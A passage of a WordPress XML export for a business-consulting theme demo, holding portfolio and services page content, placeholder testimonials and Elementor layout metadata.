		<wp:meta_value><![CDATA[[{"id":"26ace0b","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"eee344b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"df7a7a2","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"32a1880","elType":"widget","settings":{"all_text":"All","load_more":"Load More","loading_more":"Loading...","style":"p-masonry","w_gaps_mobile":{"unit":"px","size":15,"sizes":[]},"filter_typography_typography":"custom","filter_typography_font_size_mobile":{"unit":"px","size":13,"sizes":[]},"overlay_background":"#D9230099"},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:4:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:6:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:12:"is_highlight";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"style";i:1;s:13:"w_gaps_mobile";i:1;}}s:5:"style";a:2:{s:20:"filter_style_section";a:2:{s:28:"filter_typography_typography";i:1;s:34:"filter_typography_font_size_mobile";i:1;}s:21:"overlay_style_section";a:1:{s:18:"overlay_background";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2026]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Carousel</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio-carousel/</link>
		<pubDate>Fri, 11 Sep 2020 07:47:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=861</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio
<h3>Our Latest Case Studies</h3>
We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/">
<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg" alt="" width="970" height="580">
</a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/">Business Consultation</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/">
<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg" alt="" width="970" height="580">
</a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/finance-strategy/">Finance Strategy</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/marketing/">marketing</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">
<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg" alt="" width="970" height="580">
</a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">Digital Marketing</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/marketing/">marketing</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/">
<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg" alt="" width="970" height="580">
</a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/marketing/">marketing</a>

<a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/">
<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg" alt="" width="970" height="580">
</a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/data-analytics/">Data Analytics</a></h5>
/ <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-cat/strategy/">strategy</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>861</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:47:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:47:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-carousel]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"a208449","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"170","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"120","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e6f2aa0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"444437c","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"01f9e90","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"d3bcd52","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"cadf2c3","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"c55927b","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b91e1d6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0af249f","elType":"widget","settings":{"tshow_mobile":"1","dots_spacing_mobile":{"unit":"px","size":-60,"sizes":[]}},"elements":[],"widgetType":"ipcarousel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:3;}}}}s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:6:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:12:"is_highlight";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:5:"align";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}s:14:"section_layout";a:1:{s:6:"layout";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:10:"ipcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:12:"tshow_mobile";i:1;}}s:5:"style";a:1:{s:18:"navigation_section";a:1:{s:19:"dots_spacing_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2026]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/</link>
		<pubDate>Fri, 11 Sep 2020 08:07:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=868</guid>
		<description></description>
		<content:encoded><![CDATA[Improve Your Business
<h3>We Offer Great
Number of Finance Services</h3>
<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>
Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Explore More</a>
<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box2-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box2-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>
Analysis of internal processes &amp; procedures, staff activity evaluation, evaluation of technologies.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Explore More</a>
<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>
Successful experience of experts in structuring investment projects, developing and implementing.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Explore More</a>
<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>
Successful experience of experts in structuring investment projects, developing and implementing.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Explore More</a>
<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>
We are working in the format of an outsourcing project office. We assume operational coordination.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Explore More</a>
<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>
We are working in the format of an outsourcing project office. We assume operational coordination.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Explore More</a>
<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box5-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box5-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Functions</a></h5>
Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Explore More</a>
<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box6-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box6-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px"></a>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></h5>
We identify the mission, goals and strategic priorities of a business project or non-profit organization.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Explore More</a>
testimonials
<h3>What People Say About Us</h3>
“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
<h6>Oliver Simson</h6>
client of company
"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."
<h6>Mary Grey</h6>
client of company
"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."
<h6>Samanta Fox</h6>
client of company
<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio">
<figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure>
</a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio">
<figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure>
</a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio">
<figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure>
</a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio">
<figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure>
</a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio">
<figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure>
</a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio"></a>

<a href="http://themeforest.net/user/OceanThemes/portfolio">
<figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure>
</a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a><a href="http://themeforest.net/user/OceanThemes/portfolio"></a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>868</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 08:07:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 08:07:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"50913d0","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6431d9b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"2d79a54","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"d6f8efd","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"403e7f7","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"53a4218","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"40e4f84","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"33cde09","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"99d507e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"8bc24d4","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":1986},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"beb742d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3c860b2","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box2.jpg","id":1987},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"44fef9d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"5e5c00d","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":1988},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true},{"id":"89aa30f","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width"},"elements":[{"id":"d6a51ae","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"edcdae5","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":1988},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"9ec60d8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"880ea70","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":1989},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","label_link":"Explore 